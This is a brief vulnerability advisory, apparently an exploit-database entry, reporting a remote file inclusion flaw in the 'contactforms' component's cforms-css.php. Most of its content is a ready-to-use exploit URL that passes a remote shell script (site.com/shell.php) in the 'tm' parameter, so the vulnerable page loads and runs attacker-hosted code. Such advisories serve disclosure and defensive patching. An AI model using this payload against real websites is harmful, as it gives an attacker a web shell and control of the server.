contactforms suffers from a remote file inclusion vulnerability in cforms-css.php.
ed102c73a0ee64f6b839b761de2132a56caf1d07abb2d2a7a84935c3ad8db426
Discovery by: Sw33t h4cK3r
-----------
Exploit :
http://Example.com/contactforms/cforms-css.php?tm=http://site.com/shell.php